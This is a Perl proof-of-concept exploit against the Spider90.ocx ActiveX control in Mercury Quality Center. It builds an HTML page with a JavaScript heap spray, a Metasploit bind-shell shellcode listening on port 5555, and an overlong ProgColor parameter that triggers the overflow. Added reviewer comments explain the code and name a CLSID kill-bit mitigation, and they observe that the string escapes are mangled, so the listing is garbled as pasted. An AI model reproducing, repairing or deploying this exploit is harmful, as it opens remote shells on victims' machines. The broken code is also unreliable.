#!/usr/bin/perl
# POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow
# credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the
# metasploit crew. This exploit is just a cut and paste of their code; they
# deserve the credit
# Vulnerability found by Titon and Ri0t of Bastardlabs
#
# Reviewer notes (defensive reading of this listing):
#   * What it builds: one HTML file ("exploit.html") carrying (a) a JavaScript
#     heap spray (see $jscript) and (b) an <OBJECT> instance of the Spider90.ocx
#     control whose "ProgColor" PARAM is an oversized value (see $body). The
#     title attributes the overflow to that property.
#   * Transcription: every string literal on this page is mangled (quotes show
#     up as \" and the byte escapes have lost their backslash, e.g. "x00",
#     "xffxfe"), so as pasted the script does not emit the bytes the author's
#     comments describe. The code is preserved verbatim below; nothing is
#     repaired, only commented.
#   * Detection / mitigation: web content that instantiates CLSID
#     98c53984-8bf8-4d11-9b1c-c324fca9cade with an unusually long ProgColor
#     value is the observable artefact. Kill-bitting that CLSID, or removing
#     or patching the control, neutralises the delivery regardless of payload.
use strict;
# win32_bind LPORT = 5555 - Metasploit
# Payload bytes as given by the author (a Metasploit win32_bind stager on
# port 5555 per the comment above). Transcribed without backslashes, so each
# "xNN" here is three literal characters, not one byte.
my $shellcode = \"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45\".
\"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49\".
\"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d\".
\"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66\".
\"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61\".
\"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40\".
\"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32\".
\"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6\".
\"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09\".
\"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0\".
\"x66x68x15xb3x66x53x89xe1x95x68xa4x1ax70xc7x57xff\".
\"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53\".
\"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff\".
\"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64\".
\"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89\".
\"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab\".
\"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51\".
\"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53\".
\"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6\".
\"x52xffxd0x68xf0x8ax04x5fx53xffxd6xffxd0\";
# JavaScript heap spray. `bigblock` starts as %u9090 words (0x90 is the x86
# NOP opcode) and is doubled until it covers headersize + shellcode; `block`
# is then grown to just under 0x40000 chars and 350 copies of
# (block + shellcode) are held in `memory`, replicating the payload across a
# large range of the browser heap. The shellcode itself is passed through
# convert_shellcode() (below) to become %uXXXX sequences for unescape().
my $jscript = \"<script> \" .
\"shellcode = unescape(\"\" . convert_shellcode($shellcode) .\"\"); \" .
\"bigblock = unescape(\"\\%u9090\\%u9090\"); \" .
\"headersize = 20; \" .
\"slackspace = headersize+shellcode.length; \" .
\"while (bigblock.length<slackspace) bigblock+=bigblock; \" .
\"fillblock = bigblock.substring(0, slackspace); \" .
\"block = bigblock.substring(0, bigblock.length-slackspace); \" .
\"while(block.length+slackspace<0x40000) block = block+block+fillblock; \" .
\"memory = new Array(); \" .
\"for (i=0;i<350;i++) memory[i] = block + shellcode; \" .
\"</script>\";
# Page skeleton: the spray script runs from <head> before the <OBJECT> in the
# body is instantiated.
my $header = \"<html> \" .
\"<head> \" .
\"</head> \" .
$jscript .
\"<body> \";
my $footer = \"</body> \" .
\"</html>\";
# The ActiveX trigger: an <OBJECT> for Spider90.ocx (CLSID and CODEBASE
# version as the author gave them) whose ProgColor PARAM is far longer than a
# colour value. The bytes after the 'A' filler are presumably the part of the
# value the overflow acts on -- not verified from this listing.
# Note that $body already closes <body> and <html>, so $footer duplicates
# those closing tags in the written file.
my $body = \"<OBJECT ID=\"MQC\" CLASSID=\"CLSID:98c53984-8bf8-4d11-9b1c-c324fca9cade\" CODEBASE=\"Spider90.ocx#Version=9,1,0,4353\" WIDTH=100\\% HEIGHT=100\\%> \" .
\"<PARAM NAME=\"ProgColor\" value=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFFFx0dx0dx0dx0d\"> \" .
\"</object> \" .
\"</body> \" .
\"</html>\";
# FF FE is the UTF-16LE byte-order mark (the "M$ unicode file" marker the
# author refers to). The two loops below widen every character with a
# trailing NUL so the browser reads the file as UTF-16. Defender note: a
# content signature written for the ASCII form of the CLSID or PARAM will
# not match the bytes actually on disk; match on the decoded text instead.
my $page = \"xffxfe\"; # magic number of M$ unicode file
my $c;
foreach $c (split //, ($header)) {
    $page = $page . $c . \"x00\";
}
foreach $c (split //, ($body . $footer)) {
    $page = $page . $c . \"x00\";
}
# NOTE(review): bareword filehandle and unchecked open/print/close -- a failed
# write goes unreported. Left as written.
open (IE, \">\", \"exploit.html\");
print IE $page;
close IE;
# This function is copied from the JSUnescape() code in Metasploit.
#
# Encode a byte string as JavaScript unescape() %uXXXX sequences.
#   $data - the raw bytes to encode
#   $mode - 'LE' (default) emits each byte pair low byte first; any other
#           value emits it high byte first
# Returns the encoded string. Odd-length input is padded by repeating its
# last byte so every %u unit holds two bytes.
sub convert_shellcode {
    my $data = shift;
    my $mode = shift() || \'LE\';
    my $code = \'\';
    # Encode the shellcode via %u sequences for JS's unescape() function
    my $idx = 0;
    # Pad to an even number of bytes
    if (length($data) % 2 != 0) {
        $data .= substr($data, -1, 1);
    }
    while ($idx < length($data) - 1) {
        my $c1 = ord(substr($data, $idx, 1));
        my $c2 = ord(substr($data, $idx+1, 1));
        if ($mode eq \'LE\') {
            # Little-endian: second byte becomes the high half of the %u unit
            $code .= sprintf(\'%%u%.2x%.2x\', $c2, $c1);
        } else {
            $code .= sprintf(\'%%u%.2x%.2x\', $c1, $c2);
        }
        $idx += 2;
    }
    return $code;
}